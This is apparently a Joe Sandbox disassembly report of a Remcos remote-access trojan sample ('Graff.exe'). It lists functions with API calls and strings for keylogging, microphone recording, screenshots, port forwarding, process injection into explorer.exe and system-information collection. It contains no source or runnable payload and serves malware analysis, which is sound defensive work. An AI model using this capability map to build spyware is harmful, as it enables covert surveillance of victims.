_free.LIBCMT ref: 0044F45A
_free.LIBCMT ref: 0044F47F
_free.LIBCMT ref: 0044F48C
_free.LIBCMT ref: 0044F495
_free.LIBCMT ref: 0044F773
_free.LIBCMT ref: 0044F77B

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 6a70e4c358ef45cffe19a9afdbed41fda2ec9c769272c29d9eaec76f650a350b
Instruction ID: 48066223020562dfe8895eb3edc0e70975ef38ab3c96fc6f1fb07286cb8ca08d
Opcode Fuzzy Hash: 6a70e4c358ef45cffe19a9afdbed41fda2ec9c769272c29d9eaec76f650a350b
Instruction Fuzzy Hash: 2BC15772D80204BFEB20DBA9CC82FDE77F89B45704F15416AFA04FB282D6749D458B58

Function 00454982 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00454650: CreateFileW.KERNEL32(00000000,?,?,+JE,?,?,00000000,?,00454A2B,00000000,0000000C), ref: 0045466D

GetLastError.KERNEL32 ref: 00454A96
__dosmaperr.LIBCMT ref: 00454A9D
GetFileType.KERNEL32(00000000), ref: 00454AA9
GetLastError.KERNEL32 ref: 00454AB3
__dosmaperr.LIBCMT ref: 00454ABC
CloseHandle.KERNEL32(00000000), ref: 00454ADC
CloseHandle.KERNEL32(?), ref: 00454C26
GetLastError.KERNEL32 ref: 00454C58
__dosmaperr.LIBCMT ref: 00454C5F

Strings

H, xrefs: 00454BE4

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: 43154248a50fd66e96ac6d70bada307b7577a7ac671062952f04f408382b00d8
Instruction ID: 324c09394b40af715295ff654573b8bda7a64cd12b4111e7ce26936e53f9a861
Opcode Fuzzy Hash: 43154248a50fd66e96ac6d70bada307b7577a7ac671062952f04f408382b00d8
Instruction Fuzzy Hash: B0A148329041044FDF19EF78D8427AE7BA0AB86319F14015EFC159F392DB398C86C75A

Function 00419128 Relevance: 17.7, APIs: 5, Strings: 5, Instructions: 174sleeptimeCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0041912D
CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 004191EB
Sleep.KERNEL32(000003E8), ref: 0041926D
GetLocalTime.KERNEL32(?), ref: 0041927C
Sleep.KERNEL32(00000000,00000018,00000000), ref: 00419365

Strings

time_%04i%02i%02i_%02i%02i%02i, xrefs: 00419213
wnd_%04i%02i%02i_%02i%02i%02i, xrefs: 0041920E, 00419229, 004192A0
XCG, xrefs: 0041931E
XCG, xrefs: 0041923C
XCG, xrefs: 0041918A

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: Sleep$CreateDirectoryH_prologLocalTime
String ID: XCG$XCG$XCG$time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i
API String ID: 3069631530-65789007
Opcode ID: ee5279f22d5bbb827794aadffa3670e1af9e2b2f384e592815bd78e9c7a8941e
Instruction ID: b922dce7c629cfc9b1bb11cb74a08c0e3353b39699bf4d86e46594d10c943285
Opcode Fuzzy Hash: ee5279f22d5bbb827794aadffa3670e1af9e2b2f384e592815bd78e9c7a8941e
Instruction Fuzzy Hash: 33519F71A002449ACB14BBB5C856AFE7BA9AB55304F00407FF84AB71D2EF3C5E85C799

Function 00413C67 Relevance: 17.7, APIs: 8, Strings: 2, Instructions: 155COMMON

Download Yara Rule

Strings

udp, xrefs: 00413D17, 00413D1F, 00413D23
65535, xrefs: 00413C6A

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID:
String ID: 65535$udp
API String ID: 0-1267037602
Opcode ID: dd6860ede333d1e13d8ba8fd5b9e65b3a11d6160404ba42ca097fcd4ed7c504e
Instruction ID: a76ad32841e4dbbb66723cf4e0556afe3febbbe66cdf8f55616d13ac9502c32b
Opcode Fuzzy Hash: dd6860ede333d1e13d8ba8fd5b9e65b3a11d6160404ba42ca097fcd4ed7c504e
Instruction Fuzzy Hash: 9D4118716083019BD7209F29E905BAB7BD8EF85706F04082FF84197391E76DCEC186AE

Function 00404E52 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 155windowmemoryCOMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,?), ref: 00404E71
GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00404F21
TranslateMessage.USER32(?), ref: 00404F30
DispatchMessageA.USER32(?), ref: 00404F3B
HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00473F80), ref: 00404FF3
HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 0040502B

Part of subcall function 00404468: send.WS2_32(0000030C,00000000,00000000,00000000), ref: 004044FD

Strings

GetMessage, xrefs: 00404FAA
CloseChat, xrefs: 00404FBB
DisplayMessage, xrefs: 00404F9E

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
String ID: CloseChat$DisplayMessage$GetMessage
API String ID: 2956720200-749203953
Opcode ID: 5f28f7048dace9a6cd367129d91a3b351aa986f9ab174f77722088b7f138f862
Instruction ID: a70547b48422ce96676d24762269450ce3f1821fc9982c67352fb5fd346d99ba
Opcode Fuzzy Hash: 5f28f7048dace9a6cd367129d91a3b351aa986f9ab174f77722088b7f138f862
Instruction Fuzzy Hash: F741BFB16043016BC714FB75DC5A8AE77A9ABC1714F40093EF906A31E6EF38DA05C79A

Function 00409B10 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 108keyboardthreadCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32(?,?,004740F8), ref: 00409B3F
GetWindowThreadProcessId.USER32(00000000,?), ref: 00409B4B
GetKeyboardLayout.USER32(00000000), ref: 00409B52
GetKeyState.USER32(00000010), ref: 00409B5C
GetKeyboardState.USER32(?,?,004740F8), ref: 00409B67
ToUnicodeEx.USER32(0047414C,00000000,?,?,00000010,00000000,00000000), ref: 00409B8A
ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 00409BE3
ToUnicodeEx.USER32(0047414C,?,?,?,00000010,00000000,00000000), ref: 00409C1C

Strings

8[G, xrefs: 00409BFD

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
String ID: 8[G
API String ID: 1888522110-1691237782
Opcode ID: 925a5eb4e75251b1def6021025d6fe2bb9c2de734200d7c4e5adce8016dcfecb
Instruction ID: f24a8317de74a0bbad47f265c67a45df51816e9018bfad09e00086f3728f1c27
Opcode Fuzzy Hash: 925a5eb4e75251b1def6021025d6fe2bb9c2de734200d7c4e5adce8016dcfecb
Instruction Fuzzy Hash: EE318172508309AFD700DF90DC85FDBB7ECEB48715F00083ABA45961A1D6B5E948DB96

Function 00416E27 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 107filesynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,00465554), ref: 00416F24
CloseHandle.KERNEL32(00000000), ref: 00416F2D
DeleteFileA.KERNEL32(00000000), ref: 00416F3C
ShellExecuteEx.SHELL32(0000003C), ref: 00416EF0

Part of subcall function 00404468: send.WS2_32(0000030C,00000000,00000000,00000000), ref: 004044FD

Strings

Temp, xrefs: 00416E48
@FG, xrefs: 00416F69
@FG, xrefs: 00416EFD
@, xrefs: 00416ED2
<, xrefs: 00416ECB

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: CloseDeleteExecuteFileHandleObjectShellSingleWaitsend
String ID: <$@$@FG$@FG$Temp
API String ID: 1107811701-2245803885
Opcode ID: 9c4dfc691fe6c9c9641218d2b4938897261026fcf15724fe7fd1afc0ed7f65b3
Instruction ID: 21bac8b1790940aaec7d6d8591dec239f7d6dde33bc15b5890dc9a9e7f2861e5
Opcode Fuzzy Hash: 9c4dfc691fe6c9c9641218d2b4938897261026fcf15724fe7fd1afc0ed7f65b3
Instruction Fuzzy Hash: E8319C319002099BCB04FBA1DC56AFE7775AF50308F00417EF906760E2EF785A8ACB99

Function 00406616 Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 98COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00474A28,00000000,BG3i@,00003000,00000004,00000000,00000001), ref: 00406647
GetCurrentProcess.KERNEL32(00474A28,00000000,00008000,?,00000000,00000001,00000000,004068BB,C:\Users\user\AppData\Local\misruling\Graff.exe), ref: 00406705

Strings

\explorer.exe, xrefs: 0040666A
[+] NtAllocateVirtualMemory Success, xrefs: 0040667A
windir, xrefs: 00406654
explorer.exe, xrefs: 004066BD, 004066E2
PEB: %x, xrefs: 00406716
BG3i@, xrefs: 0040662C, 00406637
[-] NtAllocateVirtualMemory Error, xrefs: 004066AA

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: CurrentProcess
String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir$BG3i@
API String ID: 2050909247-4145329354
Opcode ID: 9e014c6bc4c657e1da1fcc46d0e7707e6189ac4355a26793a1c45ef91556aa58
Instruction ID: 423827b33d6c667fb1d0fc3afb55bdad30249121d517be796f0b9763ce16cf58
Opcode Fuzzy Hash: 9e014c6bc4c657e1da1fcc46d0e7707e6189ac4355a26793a1c45ef91556aa58
Instruction Fuzzy Hash: B2310871250700AFC300AB65EC45F6A37B8EB84716F11043EF50AE76E1EB79A8508B6D

Function 00419C85 Relevance: 15.1, APIs: 10, Instructions: 66serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419C94
OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CAB
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CB8
ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CC7
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CD8
CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,004195F8,00000000,00000000), ref: 00419CDB

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: Service$CloseHandle$Open$ControlManager
String ID:
API String ID: 221034970-0
Opcode ID: fa1b8ca369088c977c56d8324615d0cdc0d6a29edab9bcf25d2a1dd6b7673671
Instruction ID: aaf019a9b49167a30595a2ca3c371567d0eeee9026f0995440eeab6e66ec65be
Opcode Fuzzy Hash: fa1b8ca369088c977c56d8324615d0cdc0d6a29edab9bcf25d2a1dd6b7673671
Instruction Fuzzy Hash: 00118632901218AFD7116B64EC85DFF3FACDB45BA5B000036F502921D1DB64DD46AAF5

Function 100059D6 Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 100059EA

Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746

_free.LIBCMT ref: 100059F6
_free.LIBCMT ref: 10005A01
_free.LIBCMT ref: 10005A0C
_free.LIBCMT ref: 10005A17
_free.LIBCMT ref: 10005A22
_free.LIBCMT ref: 10005A2D
_free.LIBCMT ref: 10005A38
_free.LIBCMT ref: 10005A43
_free.LIBCMT ref: 10005A51

Memory Dump Source

Source File: 00000002.00000002.3743674864.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.3743631147.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3743674864.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_Graff.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: c98d8f3bae8e62c9802464aaca1a5f37d2e9bc397092d84fe88d11ffaa9aaf75
Instruction ID: 60753d52f1e9cb5801f9add085180c5dd3fc305f79823ad6bc57240ee419c635
Opcode Fuzzy Hash: c98d8f3bae8e62c9802464aaca1a5f37d2e9bc397092d84fe88d11ffaa9aaf75
Instruction Fuzzy Hash: BE11B97E514548FFEB11DF58D842CDE3FA9EF04291B4540A1BD088F12ADA32EE50AB84

Function 00446DCB Relevance: 15.1, APIs: 10, Instructions: 54COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00446DDF

Part of subcall function 00446AC5: RtlFreeHeap.NTDLL(00000000,00000000,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A), ref: 00446ADB
Part of subcall function 00446AC5: GetLastError.KERNEL32(0000000A,?,0044FA50,0000000A,00000000,0000000A,00000000,?,0044FCF4,0000000A,00000007,0000000A,?,00450205,0000000A,0000000A), ref: 00446AED

_free.LIBCMT ref: 00446DEB
_free.LIBCMT ref: 00446DF6
_free.LIBCMT ref: 00446E01
_free.LIBCMT ref: 00446E0C
_free.LIBCMT ref: 00446E17
_free.LIBCMT ref: 00446E22
_free.LIBCMT ref: 00446E2D
_free.LIBCMT ref: 00446E38
_free.LIBCMT ref: 00446E46

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 97a3f4e44069bc11c8e401312368c96959fa26c4fc1008248271593ee2688753
Instruction ID: b6db37451886405a3c03f61b360184b61b1678451e8b30ee63348233c964278a
Opcode Fuzzy Hash: 97a3f4e44069bc11c8e401312368c96959fa26c4fc1008248271593ee2688753
Instruction Fuzzy Hash: F011E975100408BFEB01EF55C842CDD3B65EF46354B06C0AAF9086F222DA35DE649F85

Function 00410314 Relevance: 14.2, APIs: 2, Strings: 6, Instructions: 192COMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,?), ref: 00410333
inet_ntoa.WS2_32(1A96D2C0), ref: 004103CE

Strings

StartForward, xrefs: 00410492
StopReverse, xrefs: 004104C0
>G, xrefs: 00410359
GetDirectListeningPort, xrefs: 004104D1
StartReverse, xrefs: 0041049E
StopForward, xrefs: 004104AF

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: Eventinet_ntoa
String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$>G
API String ID: 3578746661-4192532303
Opcode ID: 080842ecf22906a26162a5383409c5bde55f81ac295977a34e59aee5b224ceeb
Instruction ID: 9533851bb4e74ac183efc1d320b4a1154e984465ef7073577260c431c5a81f81
Opcode Fuzzy Hash: 080842ecf22906a26162a5383409c5bde55f81ac295977a34e59aee5b224ceeb
Instruction Fuzzy Hash: E8518471A042009BC714F779D85AAAE36A59B80318F40453FF849972E2DF7CAD85CB9F

Function 00455139 Relevance: 14.2, APIs: 1, Strings: 7, Instructions: 154COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlDecodePointer.NTDLL(?), ref: 0045515C

Strings

exp, xrefs: 00455221, 00455283
log10, xrefs: 004551A6, 004551F6
log, xrefs: 00455202, 0045520E
asin, xrefs: 004552C8
acos, xrefs: 004552D4
sqrt, xrefs: 004552E0
pow, xrefs: 00455240, 004552EC, 004552FF

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: DecodePointer
String ID: acos$asin$exp$log$log10$pow$sqrt
API String ID: 3527080286-3064271455
Opcode ID: 51615691f6b39088fe699d356a3785f8ab9cde05a1526f2a2544731867ca73e1
Instruction ID: 89d0c260ad138193cc60bb845925db7455dcb75d1c4d79333749f45855522aa5
Opcode Fuzzy Hash: 51615691f6b39088fe699d356a3785f8ab9cde05a1526f2a2544731867ca73e1
Instruction Fuzzy Hash: DA516D70900E09CBCF14DF99E9581BDBBB0FB09342F244297EC41A6266CB798A1DCB1D

Function 004165FC Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 103sleepfileCOMMON

Download Yara Rule

APIs

ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 0041665C

Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633

Sleep.KERNEL32(00000064), ref: 00416688
DeleteFileW.KERNEL32(00000000), ref: 004166BC

Strings

/t , xrefs: 0041663B
dxdiag, xrefs: 00416651
\sysinfo.txt, xrefs: 00416607
temp, xrefs: 0041660C
open, xrefs: 00416656

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: File$CreateDeleteExecuteShellSleep
String ID: /t $\sysinfo.txt$dxdiag$open$temp
API String ID: 1462127192-2001430897
Opcode ID: 8f9a9d2bc0f2f22c03b9d80f2d34e5382eba6e4d585f733ba70f257bf5922386
Instruction ID: 72b86f905f1643b809cd09d25b02ba286255726e8958c1b91c3bd62dba73c542
Opcode Fuzzy Hash: 8f9a9d2bc0f2f22c03b9d80f2d34e5382eba6e4d585f733ba70f257bf5922386
Instruction Fuzzy Hash: FD313E719001085ADB14FBA1DC96EEE7764AF50708F00013FF906731E2EF786A8ACA9D

Function 00401A8E Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 89COMMON

Download Yara Rule

APIs

_strftime.LIBCMT ref: 00401AD3

Part of subcall function 00401BE8: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401C54

waveInUnprepareHeader.WINMM(00471AC0,00000020,00000000,?), ref: 00401B85
waveInPrepareHeader.WINMM(00471AC0,00000020), ref: 00401BC3
waveInAddBuffer.WINMM(00471AC0,00000020), ref: 00401BD2

Strings

%Y-%m-%d %H.%M, xrefs: 00401AC4
`=G, xrefs: 00401B04
x=G, xrefs: 00401B8B
.wav, xrefs: 00401AEC

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
String ID: %Y-%m-%d %H.%M$.wav$`=G$x=G
API String ID: 3809562944-3643129801
Opcode ID: f0212633fa5cf9f38f05cf8a2e4e9534928b44d9bf3b648e68b0c99f1177c983
Instruction ID: ec6e8c75c27496dd15f6dcc160753dc5291fcfbcfc36b55cd818fae73feeac55
Opcode Fuzzy Hash: f0212633fa5cf9f38f05cf8a2e4e9534928b44d9bf3b648e68b0c99f1177c983
Instruction Fuzzy Hash: 6C317E315053009BC314EF25DC56A9E77E8BB94314F00883EF559A21F1EF78AA49CB9A

Function 0040196B Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 72COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNEL32(00000000,00000000), ref: 0040197B
waveInOpen.WINMM(00471AF8,000000FF,00471B00,Function_00001A8E,00000000,00000000,00000024), ref: 00401A11
waveInPrepareHeader.WINMM(00471AC0,00000020,00000000), ref: 00401A66
waveInAddBuffer.WINMM(00471AC0,00000020), ref: 00401A75
waveInStart.WINMM ref: 00401A81

Strings

XCG, xrefs: 004019A9
`=G, xrefs: 0040196F
x=G, xrefs: 00401A1E

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
String ID: XCG$`=G$x=G
API String ID: 1356121797-903574159
Opcode ID: b9d79b778b34dfc6f1519f8bfd66b07f48f7a9fbc911d0f23052e1d1eeff0420
Instruction ID: 1c4952ee711c82e1d68262a7885cb64ec938acb60d992cd4a46dee1db52e037b
Opcode Fuzzy Hash: b9d79b778b34dfc6f1519f8bfd66b07f48f7a9fbc911d0f23052e1d1eeff0420
Instruction Fuzzy Hash: 87215C316012009BC704DF7EFD1696A7BA9FB85742B00843AF50DE76B0EBB89880CB4C

Function 0041C96F Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 47windowstringCOMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041C988

Part of subcall function 0041CA1F: RegisterClassExA.USER32(00000030), ref: 0041CA6C
Part of subcall function 0041CA1F: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041CA87
Part of subcall function 0041CA1F: GetLastError.KERNEL32 ref: 0041CA91

ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041C9BF
lstrcpyn.KERNEL32(00473B68,Remcos,00000080), ref: 0041C9D9
Shell_NotifyIcon.SHELL32(00000000,00473B50), ref: 0041C9EF
TranslateMessage.USER32(?), ref: 0041C9FB
DispatchMessageA.USER32(?), ref: 0041CA05
GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041CA12

Strings

Remcos, xrefs: 0041C9CA

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
String ID: Remcos
API String ID: 1970332568-165870891
Opcode ID: 3916a83a2764b610bd39468394578f6b6e569060e520b3e5816c6a16bad35c1f
Instruction ID: 0af2178feff80faf092f0d4c6bffee9b758878d1eb04e36c9ad6546aee081b39
Opcode Fuzzy Hash: 3916a83a2764b610bd39468394578f6b6e569060e520b3e5816c6a16bad35c1f
Instruction Fuzzy Hash: 760121B1944344ABD7109FA5FC4CEDA7BBCAB45B16F004035F605E2162D7B8A285DB2D

Function 0044B450 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.3737382076.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.3737382076.0000000000473000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.3737382076.0000000000476000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_Graff.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b03e61c4093a21660133e67fc3f0c2c165a648bd703d9864a2b1dbb5c11dd296
Instruction ID: 1e235cce983953b2f50cc3566bc78ab2d8216d31b9fa4c429b6f00869d8f9d70
Opcode Fuzzy Hash: b03e61c4093a21660133e67fc3f0c2c165a648bd703d9864a2b1dbb5c11dd296
Instruction Fuzzy Hash: 27C1D774D04249AFEF11DFA9C8417AEBBB4FF4A304F14405AE814A7392C778D941CBA9

Function 00452B2A Relevance: 13.8, APIs: 9, Instructions: 268COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,00452E03,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00452BD6
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,00452E03,00000000,00000000,?,00000001,?,?,?,?), ref: 00452C59
__alloca_probe_16.LIBCMT ref: 00452C91
MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,00452E03,?,00452E03,00000000,00000000,?,00000001,?,?,?,?), ref: 00452CEC
__alloca_probe_16.LIBCMT ref: 00452D3B
